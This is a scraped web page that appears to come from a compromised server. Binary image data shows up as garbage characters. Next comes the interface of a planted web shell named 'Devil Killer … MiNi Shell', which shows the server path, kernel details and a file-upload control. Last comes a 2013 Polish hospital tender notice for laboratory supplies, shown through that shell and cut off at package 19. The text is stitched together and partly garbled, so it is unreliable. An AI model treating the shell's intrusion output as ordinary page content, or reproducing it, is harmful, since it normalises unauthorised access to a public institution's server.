JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130809/322468-N-2013.html

<p class="kh_header"><b>Poznań: ODCZYNNIKI,  SPRZĘT  JEDNORAZOWY  I  DZIERŻAWA  WYPOSAŻENIA  POMIAROWO-BADAWCZEGO  (Nr rej. L/29/13)</b><br>
<b>Numer ogłoszenia: 322468 - 2013; data zamieszczenia: 09.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ortopedyczno-Rehabilitacyjny Szpital Kliniczny im. W. Degi UM im. Karola Marcinkowskiego w Poznaniu , ul. 28 Czerwca 1956 r. nr 135/147, 61-545 Poznań, woj. wielkopolskie, tel. 61 8310142, 8310242, faks 61 8310107.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orsk.ump.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODCZYNNIKI,  SPRZĘT  JEDNORAZOWY  I  DZIERŻAWA  WYPOSAŻENIA  POMIAROWO-BADAWCZEGO  (Nr rej. L/29/13).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa podłóż bakteriologicznych, odczynników laboratoryjnych i sprzętu jednorazowego oraz dzierżawa wyposażenia pomiarowo-badawczego. Opis przedmiotu zamówienia zamieszczony jest w Załączniku nr 2 do SIWZ, w którym podano szacunkową ilość produktów usystematyzowanych w 33 pakietach.
Zamawiający wymagana aby przydatność do użycia podłóż bakteriologicznych i odczynników laboratoryjnych była nie krótsza niż ? okresu ważności po otwarciu opakowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8, 38.51.00.00-3, 38.52.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 33.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 105.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań dotyczących niniejszego warunku. Spełnieniem warunku będzie złożenie przez Wykonawcę oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy, według wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Oświadczenie Wykonawcy, że proponowane wyroby medyczne posiadają deklaracje zgodności CE. 

2)	Karty charakterystyki substancji niebezpiecznych (Zamawiający dopuszcza formę elektroniczną, tj. załączenie CD z naniesionymi kartami charakterystyki lub wskazanie strony internetowej, na której są zamieszczone).

3)	Katalogi oferowanych odczynników. W katalogu Wykonawca jest zobowiązany wskazać w formie opisu przynależność katalogowych numerów kodowych do określonych pozycji cennika.

4)	Paski do analizy moczu w ilości minimum 10 sztuk w celu sprawdzenia kompatybilności z analizatorem  -  dotyczy wyłącznie pakietu nr 28.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W przypadku gdy umocowanie osoby podpisującej ofertę nie wynika z właściwego rejestru, należy dołączyć oryginał lub odpis notarialny pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w tym postępowaniu i zawarcia umowy, podpisany przez osoby do tego umocowane zgodnie z odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej.

2)	Formularz ofertowy (sporządzony wg wzoru Zamawiającego).

3)	Cennik (sporządzony wg wzoru Zamawiającego).

4)	Określenie części zamówienia, która będzie wykonana przez Podwykonawcę (dotyczy tylko Wykonawcy, który ma zamiar powierzyć wykonanie części zamówienia Podwykonawcy).

5)	Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (sporządzona wg wzoru Zamawiającego).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy określone zostały w projekcie umowy stanowiącej część SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.orsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ortopedyczno - Rehabilitacyjny Szpital Kliniczny im. W. Degi UM w Poznaniu ul. 28 Czerwca 1956r nr 135/147, 61-545 Poznań - Sekcja Zamówień Publicznych i Zaopatrzenia (pok. 173 i 174).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 10:00, miejsce: Kancelaria Szpitala (pok. 35), mieszcząca się w siedzibie Zamawiającego przy ul. 28 Czerwca 1956r nr 135/147.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> EZY,  PŁYTKI  PETRIEGO,  WYMAZÓWKI,  KRIOBANKI - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KUWETY  POMIAROWE  DO  ANALIZATORA  TYP  COBAS  MIRA S, NACZYNKA  DO  SUROWICY,  PIPETKI  PASTEURA,  PROBÓWKI  Z  PS  i  TPX,  KORKI  DO  PRÓBÓWEK,  POJEMNIKI  DO  BARWIENIA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KOŃCÓWKI  DO  PIPET - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> POJEMNIKI  DO  MOCZU  Z  DISPENSEREM - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> STERYLNE  POJEMNIKI  DO  MOCZU - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SYSTEM   ZAMKNIĘTY,  ASPIRACYJNO-PRÓŻNIOWY  DO  POBIERANIA  KRWI  ORAZ  MIKROMETODA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NAKŁUWACZE  JEDNORAZOWE  DO  POBIERANIA  Z  NACZYŃ  WŁOSOWATYCH - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PROBÓWKI  OB  do  1ml. Szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KAPILARY  DO  POMIARU  GAZOMETRII  KRWI - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> POJEMNIKI  NA  KAŁ - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZKIEŁKA  PODSTAWOWE  I  NAKRYWKOWE - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PODŁOŻA  BAKTERIOLOGICZNE  NA  PŁYTKACH - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PODŁOŻA  BAKTERIOLOGICZNE  W  BUTELKACH  I  PROBÓWKACH - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAWY  I  TESTY   DIAGNOSTYCZNE  DO  BAKTERIOLOGII - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TESTY  MIKROBIOLOGICZNE  IDENTYFIKACYJNE  (METODA  MANUALNA) - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KRĄŻKI  Z  ANTYBIOTYKAMI - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PASKI  Z  GRADIENTEM  STĘŻEŃ  ANTYBIOTYKÓW - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ODCZYNNIKI  DO  IDENTYFIKACJI  BAKTERII  ORAZ  OKREŚLANIA  LEKOWRAŻLIWOŚCI  Z  DZIERŻAWĄ  ANALIZATORA - szczegółowy opis oraz ilości podano w załączniku nr 2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19.</p>
